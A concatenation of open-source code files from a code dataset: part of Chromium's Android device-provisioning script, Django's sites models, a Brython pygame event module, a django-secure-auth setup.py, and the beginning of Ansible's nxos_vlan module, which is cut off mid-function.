battery = battery_utils.BatteryUtils(device)
battery.LetBatteryCoolToTemperature(options.max_battery_temp)
except device_errors.CommandFailedError:
logging.exception('Unable to let battery cool to specified temperature.')
def _set_and_verify_date():
if device.build_version_sdk >= version_codes.MARSHMALLOW:
date_format = '%m%d%H%M%Y.%S'
set_date_command = ['date', '-u']
get_date_command = ['date', '-u']
else:
date_format = '%Y%m%d.%H%M%S'
set_date_command = ['date', '-s']
get_date_command = ['date']
# TODO(jbudorick): This is wrong on pre-M devices -- get/set are
# dealing in local time, but we're setting based on GMT.
strgmtime = time.strftime(date_format, time.gmtime())
set_date_command.append(strgmtime)
device.RunShellCommand(set_date_command, as_root=True, check_return=True)
get_date_command.append('+"%Y%m%d.%H%M%S"')
device_time = device.RunShellCommand(
get_date_command, as_root=True, single_line=True).replace('"', '')
device_time = datetime.datetime.strptime(device_time, "%Y%m%d.%H%M%S")
correct_time = datetime.datetime.strptime(strgmtime, date_format)
tdelta = (correct_time - device_time).seconds
if tdelta <= 1:
logging.info('Date/time successfully set on %s', device)
return True
else:
logging.error('Date mismatch. Device: %s Correct: %s',
device_time.isoformat(), correct_time.isoformat())
return False
# Sometimes the date is not set correctly on the devices. Retry on failure.
if device.IsUserBuild():
# TODO(bpastene): Figure out how to set the date & time on user builds.
pass
else:
if not timeout_retry.WaitFor(
_set_and_verify_date, wait_period=1, max_tries=2):
raise device_errors.CommandFailedError(
'Failed to set date & time.', device_serial=str(device))
props = device.RunShellCommand('getprop', check_return=True)
for prop in props:
logging.info(' %s', prop)
if options.auto_reconnect:
_PushAndLaunchAdbReboot(device, options.target)
def _UninstallIfMatch(device, pattern, app_to_keep):
installed_packages = device.RunShellCommand(['pm', 'list', 'packages'])
installed_system_packages = [
pkg.split(':')[1] for pkg in device.RunShellCommand(['pm', 'list',
'packages', '-s'])]
for package_output in installed_packages:
package = package_output.split(":")[1]
if pattern.match(package) and not package == app_to_keep:
if not device.IsUserBuild() or package not in installed_system_packages:
device.Uninstall(package)
def _WipeUnderDirIfMatch(device, path, pattern):
for filename in device.ListDirectory(path):
if pattern.match(filename):
_WipeFileOrDir(device, posixpath.join(path, filename))
def _WipeFileOrDir(device, path):
if device.PathExists(path):
device.RunShellCommand(['rm', '-rf', path], check_return=True)
def _PushAndLaunchAdbReboot(device, target):
"""Pushes and launches the adb_reboot binary on the device.
Arguments:
device: The DeviceUtils instance for the device to which the adb_reboot
binary should be pushed.
target: The build target (example, Debug or Release) which helps in
locating the adb_reboot binary.
"""
logging.info('Will push and launch adb_reboot on %s', str(device))
# Kill if adb_reboot is already running.
device.KillAll('adb_reboot', blocking=True, timeout=2, quiet=True)
# Push adb_reboot
logging.info(' Pushing adb_reboot ...')
adb_reboot = os.path.join(host_paths.DIR_SOURCE_ROOT,
'out/%s/adb_reboot' % target)
device.PushChangedFiles([(adb_reboot, '/data/local/tmp/')])
# Launch adb_reboot
logging.info(' Launching adb_reboot ...')
device.RunShellCommand(
['/data/local/tmp/adb_reboot'],
check_return=True)
def _LaunchHostHeartbeat():
# Kill if existing host_heartbeat
KillHostHeartbeat()
# Launch a new host_heartbeat
logging.info('Spawning host heartbeat...')
subprocess.Popen([os.path.join(host_paths.DIR_SOURCE_ROOT,
'build/android/host_heartbeat.py')])
def KillHostHeartbeat():
ps = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)
stdout, _ = ps.communicate()
matches = re.findall('\\n.*host_heartbeat.*', stdout)
for match in matches:
logging.info('An instance of host heart beart running... will kill')
pid = re.findall(r'(\S+)', match)[1]
subprocess.call(['kill', str(pid)])
def main():
# Recommended options on perf bots:
# --disable-network
# TODO(tonyg): We eventually want network on. However, currently radios
# can cause perfbots to drain faster than they charge.
# --min-battery-level 95
# Some perf bots run benchmarks with USB charging disabled which leads
# to gradual draining of the battery. We must wait for a full charge
# before starting a run in order to keep the devices online.
parser = argparse.ArgumentParser(
description='Provision Android devices with settings required for bots.')
parser.add_argument('-d', '--device', metavar='SERIAL',
help='the serial number of the device to be provisioned'
' (the default is to provision all devices attached)')
parser.add_argument('--adb-path',
help='Absolute path to the adb binary to use.')
parser.add_argument('--blacklist-file', help='Device blacklist JSON file.')
parser.add_argument('--phase', action='append', choices=_PHASES.ALL,
dest='phases',
help='Phases of provisioning to run. '
'(If omitted, all phases will be run.)')
parser.add_argument('--skip-wipe', action='store_true', default=False,
help="don't wipe device data during provisioning")
parser.add_argument('--reboot-timeout', metavar='SECS', type=int,
help='when wiping the device, max number of seconds to'
' wait after each reboot '
'(default: %s)' % _DEFAULT_TIMEOUTS.HELP_TEXT)
parser.add_argument('--min-battery-level', type=int, metavar='NUM',
help='wait for the device to reach this minimum battery'
' level before trying to continue')
parser.add_argument('--disable-location', action='store_true',
help='disable Google location services on devices')
parser.add_argument('--disable-mock-location', action='store_true',
default=False, help='Set ALLOW_MOCK_LOCATION to false')
parser.add_argument('--disable-network', action='store_true',
help='disable network access on devices')
parser.add_argument('--disable-java-debug', action='store_false',
dest='enable_java_debug', default=True,
help='disable Java property asserts and JNI checking')
parser.add_argument('--disable-system-chrome', action='store_true',
help='Disable the system chrome from devices.')
parser.add_argument('--remove-system-webview', action='store_true',
help='Remove the system webview from devices.')
parser.add_argument('-t', '--target', default='Debug',
help='the build target (default: %(default)s)')
parser.add_argument('-r', '--auto-reconnect', action='store_true',
help='push binary which will reboot the device on adb'
' disconnections')
parser.add_argument('--adb-key-files', type=str, nargs='+',
help='list of adb keys to push to device')
parser.add_argument('-v', '--verbose', action='count', default=1,
help='Log more information.')
parser.add_argument('--max-battery-temp', type=int, metavar='NUM',
help='Wait for the battery to have this temp or lower.')
parser.add_argument('--output-device-blacklist',
help='Json file to output the device blacklist.')
parser.add_argument('--chrome-specific-wipe', action='store_true',
help='only wipe chrome specific data during provisioning')
parser.add_argument('--emulators', action='store_true',
help='provision only emulators and ignore usb devices')
args = parser.parse_args()
constants.SetBuildType(args.target)
run_tests_helper.SetLogLevel(args.verbose)
devil_chromium.Initialize(adb_path=args.adb_path)
try:
return ProvisionDevices(args)
except (device_errors.DeviceUnreachableError, device_errors.NoDevicesError):
return exit_codes.INFRA
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
hunch/hunch-sample-app | django/contrib/sites/models.py | 12 | 2962 | from django.db import models
from django.utils.translation import ugettext_lazy as _
SITE_CACHE = {}
class SiteManager(models.Manager):
def get_current(self):
"""
Returns the current ``Site`` based on the SITE_ID in the
project's settings. The ``Site`` object is cached the first
time it's retrieved from the database.
"""
from django.conf import settings
try:
sid = settings.SITE_ID
except AttributeError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("You're using the Django \"sites framework\" without having set the SITE_ID setting. Create a site in your database and set the SITE_ID setting to fix this error.")
try:
current_site = SITE_CACHE[sid]
except KeyError:
current_site = self.get(pk=sid)
SITE_CACHE[sid] = current_site
return current_site
def clear_cache(self):
"""Clears the ``Site`` object cache."""
global SITE_CACHE
SITE_CACHE = {}
class Site(models.Model):
domain = models.CharField(_('domain name'), max_length=100)
name = models.CharField(_('display name'), max_length=50)
objects = SiteManager()
class Meta:
db_table = 'django_site'
verbose_name = _('site')
verbose_name_plural = _('sites')
ordering = ('domain',)
def __unicode__(self):
return self.domain
def save(self, *args, **kwargs):
super(Site, self).save(*args, **kwargs)
# Cached information will likely be incorrect now.
if self.id in SITE_CACHE:
del SITE_CACHE[self.id]
def delete(self):
pk = self.pk
super(Site, self).delete()
try:
del SITE_CACHE[pk]
except KeyError:
pass
class RequestSite(object):
"""
A class that shares the primary interface of Site (i.e., it has
``domain`` and ``name`` attributes) but gets its data from a Django
HttpRequest object rather than from a database.
The save() and delete() methods raise NotImplementedError.
"""
def __init__(self, request):
self.domain = self.name = request.get_host()
def __unicode__(self):
return self.domain
def save(self, force_insert=False, force_update=False):
raise NotImplementedError('RequestSite cannot be saved.')
def delete(self):
raise NotImplementedError('RequestSite cannot be deleted.')
def get_current_site(request):
"""
Checks if contrib.sites is installed and returns either the current
``Site`` object or a ``RequestSite`` object based on the request.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
return current_site
| mit |
40223137/w17w17 | static/Brython3.1.3-20150514-095342/Lib/site-packages/pygame/event.py | 603 | 19086 | #!/usr/bin/env python
'''Pygame module for interacting with events and queues.
Pygame handles all it's event messaging through an event queue. The routines
in this module help you manage that event queue. The input queue is heavily
dependent on the pygame display module. If the display has not been
initialized and a video mode not set, the event queue will not really work.
The queue is a regular queue of Event objects, there are a variety of ways
to access the events it contains. From simply checking for the existance of
events, to grabbing them directly off the stack.
All events have a type identifier. This event type is in between the values
of NOEVENT and NUMEVENTS. All user defined events can have the value of
USEREVENT or higher. It is recommended make sure your event id's follow this
system.
To get the state of various input devices, you can forego the event queue
and access the input devices directly with their appropriate modules; mouse,
key, and joystick. If you use this method, remember that pygame requires some
form of communication with the system window manager and other parts of the
platform. To keep pygame in synch with the system, you will need to call
pygame.event.pump() to keep everything current. You'll want to call this
function usually once per game loop.
The event queue offers some simple filtering. This can help performance
slightly by blocking certain event types from the queue, use the
pygame.event.set_allowed() and pygame.event.set_blocked() to work with
this filtering. All events default to allowed.
Joysticks will not send any events until the device has been initialized.
An Event object contains an event type and a readonly set of member data.
The Event object contains no method functions, just member data. Event
objects are retrieved from the pygame event queue. You can create your
own new events with the pygame.event.Event() function.
Your program must take steps to keep the event queue from overflowing. If the
program is not clearing or getting all events off the queue at regular
intervals, it can overflow. When the queue overflows an exception is thrown.
All Event objects contain an event type identifier in the Event.type member.
You may also get full access to the Event's member data through the Event.dict
method. All other member lookups will be passed through to the Event's
dictionary values.
While debugging and experimenting, you can print the Event objects for a
quick display of its type and members. Events that come from the system
will have a guaranteed set of member items based on the type. Here is a
list of the Event members that are defined with each type.
QUIT
(none)
ACTIVEEVENT
gain, state
KEYDOWN
unicode, key, mod
KEYUP
key, mod
MOUSEMOTION
pos, rel, buttons
MOUSEBUTTONUP
pos, button
MOUSEBUTTONDOWN
pos, button
JOYAXISMOTION
joy, axis, value
JOYBALLMOTION
joy, ball, rel
JOYHATMOTION
joy, hat, value
JOYBUTTONUP
joy, button
JOYBUTTONDOWN
joy, button
VIDEORESIZE
size, w, h
VIDEOEXPOSE
(none)
USEREVENT
code
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from copy import copy
#from ctypes import * #brython
from SDL import *
import pygame.base
import pygame.locals
import pygame.display
def pump():
'''Internally process pygame event handlers.
For each frame of your game, you will need to make some sort of call to
the event queue. This ensures your program can internally interact with
the rest of the operating system. If you are not using other event
functions in your game, you should call pygame.event.pump() to allow
pygame to handle internal actions.
This function is not necessary if your program is consistently processing
events on the queue through the other pygame.event functions.
There are important things that must be dealt with internally in the event
queue. The main window may need to be repainted or respond to the system.
If you fail to make a call to the event queue for too long, the system may
decide your program has locked up.
'''
pygame.display._video_init_check()
SDL_PumpEvents()
def get(typelist=None):
'''Get events from the queue.
pygame.event.get(): return Eventlist
pygame.event.get(type): return Eventlist
pygame.event.get(typelist): return Eventlist
This will get all the messages and remove them from the queue. If a type
or sequence of types is given only those messages will be removed from the
queue.
If you are only taking specific events from the queue, be aware that the
queue could eventually fill up with the events you are not interested.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types that can be returned.
:rtype: list of `Event`
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
events = []
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
events.append(Event(0, sdl_event=new_events[0]))
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
return events
def poll():
'''Get a single event from the queue.
Returns a single event from the queue. If the event queue is empty an event
of type pygame.NOEVENT will be returned immediately. The returned event is
removed from the queue.
:rtype: Event
'''
pygame.display._video_init_check()
event = SDL_PollEventAndReturn()
if event:
return Event(0, sdl_event=event, keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT)
def wait():
'''Wait for a single event from the queue.
Returns a single event from the queue. If the queue is empty this function
will wait until one is created. While the program is waiting it will sleep
in an idle state. This is important for programs that want to share the
system with other applications.
:rtype: Event
'''
pygame.display._video_init_check()
return Event(0, sdl_event=SDL_WaitEventAndReturn())
def peek(typelist=None):
'''Test if event types are waiting on the queue.
Returns true if there are any events of the given type waiting on the
queue. If a sequence of event types is passed, this will return True if
any of those events are on the queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to look for.
:rtype: bool
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = SDL_EVENTMASK(int(typelist))
SDL_PumpEvents()
events = SDL_PeepEvents(1, SDL_PEEKEVENT, mask)
if typelist is None:
if events:
return Event(0, sdl_event=events[0], keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT) # XXX deviation from pygame
return len(events) > 0
def clear(typelist=None):
'''Remove all events from the queue.
Remove all events or events of a specific type from the queue. This has the
same effect as `get` except nothing is returned. This can be slightly more
effecient when clearing a full event queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to remove.
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
events = []
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
_event_names = {
SDL_ACTIVEEVENT: 'ActiveEvent',
SDL_KEYDOWN: 'KeyDown',
SDL_KEYUP: 'KeyUp',
SDL_MOUSEMOTION: 'MouseMotion',
SDL_MOUSEBUTTONDOWN:'MouseButtonDown',
SDL_MOUSEBUTTONUP: 'MouseButtonUp',
SDL_JOYAXISMOTION: 'JoyAxisMotion',
SDL_JOYBALLMOTION: 'JoyBallMotion',
SDL_JOYHATMOTION: 'JoyHatMotion',
SDL_JOYBUTTONUP: 'JoyButtonUp',
SDL_JOYBUTTONDOWN: 'JoyButtonDown',
SDL_QUIT: 'Quit',
SDL_SYSWMEVENT: 'SysWMEvent',
SDL_VIDEORESIZE: 'VideoResize',
SDL_VIDEOEXPOSE: 'VideoExpose',
SDL_NOEVENT: 'NoEvent'
}
def event_name(event_type):
'''Get the string name from an event id.
Pygame uses integer ids to represent the event types. If you want to
report these types to the user they should be converted to strings. This
will return a the simple name for an event type. The string is in the
CamelCase style.
:Parameters:
- `event_type`: int
:rtype: str
'''
if event_type >= SDL_USEREVENT and event_type < SDL_NUMEVENTS:
return 'UserEvent'
return _event_names.get(event_type, 'Unknown')
def set_blocked(typelist):
'''Control which events are allowed on the queue.
The given event types are not allowed to appear on the event queue. By
default all events can be placed on the queue. It is safe to disable an
event type multiple times.
If None is passed as the argument, this has the opposite effect and none of
the event types are allowed to be placed on the queue.
:note: events posted with `post` will not be blocked.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_IGNORE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_IGNORE)
else:
SDL_EventState(typelist, SDL_IGNORE)
def set_allowed(typelist):
'''Control which events are allowed on the queue.
The given event types are allowed to appear on the event queue. By default
all events can be placed on the queue. It is safe to enable an event type
multiple times.
If None is passed as the argument, this has the opposite effect and all of
the event types are allowed to be placed on the queue.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_ENABLE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_ENABLE)
else:
SDL_EventState(typelist, SDL_ENABLE)
def get_blocked(typelist):
'''Test if a type of event is blocked from the queue.
Returns true if the given event type is blocked from the queue.
:Parameters:
- `event_type`: int
:rtype: int
'''
pygame.display._video_init_check()
if typelist == None:
return SDL_EventState(SDL_ALLEVENTS, SDL_QUERY) == SDL_ENABLE
elif hasattr(typelist, '__len__'): # XXX undocumented behaviour
for val in typelist:
if SDL_EventState(val, SDL_QUERY) == SDL_ENABLE:
return True
return False
else:
return SDL_EventState(typelist, SDL_QUERY) == SDL_ENABLE
def set_grab(grab):
'''Control the sharing of input devices with other applications.
When your program runs in a windowed environment, it will share the mouse
and keyboard devices with other applications that have focus. If your
program sets the event grab to True, it will lock all input into your
program.
It is best to not always grab the input, since it prevents the user from
doing other things on their system.
:Parameters:
- `grab`: bool
'''
pygame.display._video_init_check()
if grab:
SDL_WM_GrabInput(SDL_GRAB_ON)
else:
SDL_WM_GrabInput(SDL_GRAB_OFF)
def get_grab():
'''Test if the program is sharing input devices.
Returns true when the input events are grabbed for this application. Use
`set_grab` to control this state.
:rtype: bool
'''
pygame.display._video_init_check()
return SDL_WM_GrabInput(SDL_GRAB_QUERY) == SDL_GRAB_ON
_USEROBJECT_CHECK1 = int(0xdeadbeef) # signed
_USEROBJECT_CHECK2 = 0xfeedf00d
_user_event_objects = {}
_user_event_nextid = 1
def post(event):
'''Place a new event on the queue.
This places a new event at the end of the event queue. These Events will
later be retrieved from the other queue functions.
This is usually used for placing pygame.USEREVENT events on the queue.
Although any type of event can be placed, if using the sytem event types
your program should be sure to create the standard attributes with
appropriate values.
:Parameters:
`event` : Event
Event to add to the queue.
'''
global _user_event_nextid
pygame.display._video_init_check()
sdl_event = SDL_Event(event.type)
sdl_event.user.code = _USEROBJECT_CHECK1
sdl_event.user.data1 = c_void_p(_USEROBJECT_CHECK2)
sdl_event.user.data2 = c_void_p(_user_event_nextid)
_user_event_objects[_user_event_nextid] = event
_user_event_nextid += 1
SDL_PushEvent(sdl_event)
class Event:
def __init__(self, event_type, event_dict=None, sdl_event=None,
keep_userdata=False, **attributes):
'''Create a new event object.
Creates a new event with the given type. The event is created with the
given attributes and values. The attributes can come from a dictionary
argument, or as string keys from a dictionary.
The given attributes will be readonly attributes on the new event
object itself. These are the only attributes on the Event object,
there are no methods attached to Event objects.
:Parameters:
`event_type` : int
Event type to create
`event_dict` : dict
Dictionary of attributes to assign.
`sdl_event` : `SDL_Event`
Construct a Pygame event from the given SDL_Event; used
internally.
`keep_userdata` : bool
Used internally.
`attributes` : additional keyword arguments
Additional attributes to assign to the event.
'''
if sdl_event:
uevent = cast(pointer(sdl_event), POINTER(SDL_UserEvent)).contents
if uevent.code == _USEROBJECT_CHECK1 and \
uevent.data1 == _USEROBJECT_CHECK2 and \
uevent.data2 in _user_event_objects:
# An event that was posted; grab dict from local store.
id = sdl_event.data2
for key, value in _user_event_objects[id].__dict__.items():
setattr(self, key, value)
# Free memory unless just peeking
if not keep_userdata:
del _user_event_objects[id]
else:
# Standard SDL event
self.type = sdl_event.type
if self.type == SDL_QUIT:
pass
elif self.type == SDL_ACTIVEEVENT:
self.gain = sdl_event.gain
self.state = sdl_event.state
elif self.type == SDL_KEYDOWN:
self.unicode = sdl_event.keysym.unicode
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_KEYUP:
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_MOUSEMOTION:
self.pos = (sdl_event.x, sdl_event.y)
self.rel = (sdl_event.xrel, sdl_event.yrel)
self.buttons = (sdl_event.state & SDL_BUTTON(1) != 0,
sdl_event.state & SDL_BUTTON(2) != 0,
sdl_event.state & SDL_BUTTON(3) != 0)
elif self.type in (SDL_MOUSEBUTTONDOWN, SDL_MOUSEBUTTONUP):
self.pos = (sdl_event.x, sdl_event.y)
self.button = sdl_event.button
elif self.type == SDL_JOYAXISMOTION:
self.joy = sdl_event.which
self.axis = sdl_event.axis
self.value = sdl_event.value / 32767.0
elif self.type == SDL_JOYBALLMOTION:
self.joy = sdl_event.which
self.ball = sdl_event.ball
self.rel = (sdl_event.xrel, sdl_event.yrel)
elif self.type == SDL_JOYHATMOTION:
self.joy = sdl_event.which
self.hat = sdl_event.hat
hx = hy = 0
if sdl_event.value & SDL_HAT_UP:
hy = 1
if sdl_event.value & SDL_HAT_DOWN:
hy = -1
if sdl_event.value & SDL_HAT_RIGHT:
hx = 1
if sdl_event.value & SDL_HAT_LEFT:
hx = -1
self.value = (hx, hy)
elif self.type in (SDL_JOYBUTTONUP, SDL_JOYBUTTONDOWN):
self.joy = sdl_event.which
self.button = sdl_event.button
elif self.type == SDL_VIDEORESIZE:
self.size = (sdl_event.w, sdl_event.h)
self.w = sdl_event.w
self.h = sdl_event.h
elif self.type == SDL_VIDEOEXPOSE:
pass
elif self.type == SDL_SYSWMEVENT:
pass ### XXX: not implemented
elif self.type >= SDL_USEREVENT and self.type < SDL_NUMEVENTS:
self.code = sdl_event.code
else:
# Create an event (not from event queue)
self.type = event_type
if event_dict:
for key, value in event_dict.items():
setattr(self, key, value)
for key, value in attributes.items():
setattr(self, key, value)
# Bizarre undocumented but used by some people.
self.dict = self.__dict__
def __repr__(self):
d = copy(self.__dict__)
del d['type']
return '<Event(%d-%s %r)>' % \
(self.type, event_name(self.type), d)
def __nonzero__(self):
return self.type != SDL_NOEVENT
EventType = Event
| gpl-3.0 |
gotlium/django-secure-auth | setup.py | 2 | 1737 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from secureauth import get_version
setup(
name='django-secure-auth',
version=get_version(),
description='Secure authentication by TOTP, SMS, Codes & Question',
keywords='django secure auth protection totp sms codes question',
long_description=open('README.rst').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
],
author="GoTLiuM InSPiRiT",
author_email='gotlium@gmail.com',
url='https://github.com/gotlium/django-secure-auth',
license='GPL v3',
packages=find_packages(exclude=['demo']),
include_package_data=True,
package_data={'secureauth': [
'templates/secureauth/*.html',
'templates/secureauth/codes_settings/*.html',
'templates/secureauth/phone_settings/*.html',
'templates/secureauth/question_settings/*.html',
'templates/secureauth/totp_settings/*.html',
'locale/*/LC_MESSAGES/*.po'
'static/secureauth/js/*.js'
]},
zip_safe=False,
install_requires=[
'pyotp>=1.3.1',
'httpagentparser>=1.5.0',
'django-tables2>=0.14.0',
'django-filter>=0.7',
'phonenumbers>=6.1.0',
'django-simple-captcha>=0.4.2',
'django-ipware>=0.0.8',
'slowaes==0.1a1',
'ipaddress>=1.0.6',
'django-phonenumber-field>=0.5',
]
)
| gpl-3.0 |
elventear/ansible | lib/ansible/modules/network/nxos/nxos_vlan.py | 4 | 13607 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: nxos_vlan
version_added: "2.1"
short_description: Manages VLAN resources and attributes.
description:
- Manages VLAN configurations on NX-OS switches.
author: Jason Edelman (@jedelman8)
options:
vlan_id:
description:
- Single VLAN ID.
required: false
default: null
vlan_range:
description:
- Range of VLANs such as 2-10 or 2,5,10-15, etc.
required: false
default: null
name:
description:
- Name of VLAN.
required: false
default: null
vlan_state:
description:
- Manage the vlan operational state of the VLAN
(equivalent to state {active | suspend} command.
required: false
default: active
choices: ['active','suspend']
admin_state:
description:
- Manage the VLAN administrative state of the VLAN equivalent
to shut/no shut in VLAN config mode.
required: false
default: up
choices: ['up','down']
mapped_vni:
description:
- The Virtual Network Identifier (VNI) ID that is mapped to the
VLAN. Valid values are integer and keyword 'default'.
required: false
default: null
version_added: "2.2"
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: Ensure a range of VLANs are not present on the switch
nxos_vlan:
vlan_range: "2-10,20,50,55-60,100-150"
host: 68.170.147.165
username: cisco
password: cisco
state: absent
transport: nxapi
- name: Ensure VLAN 50 exists with the name WEB and is in the shutdown state
nxos_vlan:
vlan_id: 50
host: 68.170.147.165
admin_state: down
name: WEB
transport: nxapi
username: cisco
password: cisco
- name: Ensure VLAN is NOT on the device
nxos_vlan:
vlan_id: 50
host: 68.170.147.165
state: absent
transport: nxapi
username: cisco
password: cisco
'''
RETURN = '''
proposed_vlans_list:
description: list of VLANs being proposed
returned: always
type: list
sample: ["100"]
existing_vlans_list:
description: list of existing VLANs on the switch prior to making changes
returned: always
type: list
sample: ["1", "2", "3", "4", "5", "20"]
end_state_vlans_list:
description: list of VLANs after the module is executed
returned: always
type: list
sample: ["1", "2", "3", "4", "5", "20", "100"]
proposed:
description: k/v pairs of parameters passed into module (does not include
vlan_id or vlan_range)
returned: always
type: dict or null
sample: {"admin_state": "down", "name": "app_vlan",
"vlan_state": "suspend", "mapped_vni": "5000"}
existing:
description: k/v pairs of existing vlan or null when using vlan_range
returned: always
type: dict
sample: {"admin_state": "down", "name": "app_vlan",
"vlan_id": "20", "vlan_state": "suspend", "mapped_vni": ""}
end_state:
description: k/v pairs of the VLAN after executing module or null
when using vlan_range
returned: always
type: dict or null
sample: {"admin_state": "down", "name": "app_vlan", "vlan_id": "20",
"vlan_state": "suspend", "mapped_vni": "5000"}
updates:
description: command string sent to the device
returned: always
type: list
sample: ["vlan 20", "vlan 55", "vn-segment 5000"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import get_config, load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
import re
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.nxos import run_commands, load_config, get_config
from ansible.module_utils.basic import AnsibleModule
def vlan_range_to_list(vlans):
result = []
if vlans:
for part in vlans.split(','):
if part == 'none':
break
if '-' in part:
a, b = part.split('-')
a, b = int(a), int(b)
result.extend(range(a, b + 1))
else:
a = int(part)
result.append(a)
return numerical_sort(result)
return result
def numerical_sort(string_int_list):
"""Sort list of strings (VLAN IDs) that are digits in numerical order.
"""
as_int_list = []
as_str_list = []
for vlan in string_int_list:
as_int_list.append(int(vlan))
as_int_list.sort()
for vlan in as_int_list:
as_str_list.append(str(vlan))
return as_str_list
def build_commands(vlans, state):
commands = []
for vlan in vlans:
if state == 'present':
command = 'vlan {0}'.format(vlan)
commands.append(command)
elif state == 'absent':
command = 'no vlan {0}'.format(vlan)
commands.append(command)
return commands
def get_vlan_config_commands(vlan, vid):
"""Build command list required for VLAN configuration
"""
reverse_value_map = {
"admin_state": {
"down": "shutdown",
"up": "no shutdown"
}
}
if vlan.get('admin_state'):
# apply value map when making change to the admin state
# note: would need to be a loop or more in depth check if
# value map has more than 1 key
vlan = apply_value_map(reverse_value_map, vlan)
VLAN_ARGS = {
'name': 'name {0}',
'vlan_state': 'state {0}',
'admin_state': '{0}',
'mode': 'mode {0}',
'mapped_vni': 'vn-segment {0}'
}
commands = []
for param, value in vlan.items():
if param == 'mapped_vni' and value == 'default':
command = 'no vn-segment'
else:
command = VLAN_ARGS.get(param).format(vlan.get(param))
if command:
commands.append(command)
commands.insert(0, 'vlan ' + vid)
commands.append('exit')
return commands
def get_list_of_vlans(module):
body = run_commands(module, ['show vlan | json'])
vlan_list = []
vlan_table = body[0].get('TABLE_vlanbrief')['ROW_vlanbrief']
if isinstance(vlan_table, list):
for vlan in vlan_table:
vlan_list.append(str(vlan['vlanshowbr-vlanid-utf']))
else:
vlan_list.append('1')
return vlan_list
def get_vni(vlanid, module):
flags = str('all | section vlan.{0}'.format(vlanid)).split(' ')
body = get_config(module, flags=flags)
#command = 'show run all | section vlan.{0}'.format(vlanid)
#body = execute_show_command(command, module, command_type='cli_show_ascii')[0]
value = ''
if body:
REGEX = re.compile(r'(?:vn-segment\s)(?P<value>.*)$', re.M)
if 'vn-segment' in body:
value = REGEX.search(body).group('value')
return value
def get_vlan(vlanid, module):
"""Get instance of VLAN as a dictionary
"""
command = 'show vlan id %s | json' % vlanid
body = run_commands(module, [command])
#command = 'show vlan id ' + vlanid
#body = execute_show_command(command, module)
try:
vlan_table = body[0]['TABLE_vlanbriefid']['ROW_vlanbriefid']
except (TypeError, IndexError):
return {}
key_map = {
"vlanshowbr-vlanid-utf": "vlan_id",
"vlanshowbr-vlanname": "name",
"vlanshowbr-vlanstate": "vlan_state",
"vlanshowbr-shutstate": "admin_state"
}
vlan = apply_key_map(key_map, vlan_table)
value_map = {
"admin_state": {
"shutdown": "down",
"noshutdown": "up"
}
}
vlan = apply_value_map(value_map, vlan)
vlan['mapped_vni'] = get_vni(vlanid, module)
return vlan
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = str(value)
return new_dict
def apply_value_map(value_map, resource):
for key, value in value_map.items():
resource[key] = value[resource.get(key)]
return resource
def main():
argument_spec = dict(
vlan_id=dict(required=False, type='str'),
vlan_range=dict(required=False),
name=dict(required=False),
vlan_state=dict(choices=['active', 'suspend'], required=False),
mapped_vni=dict(required=False, type='str'),
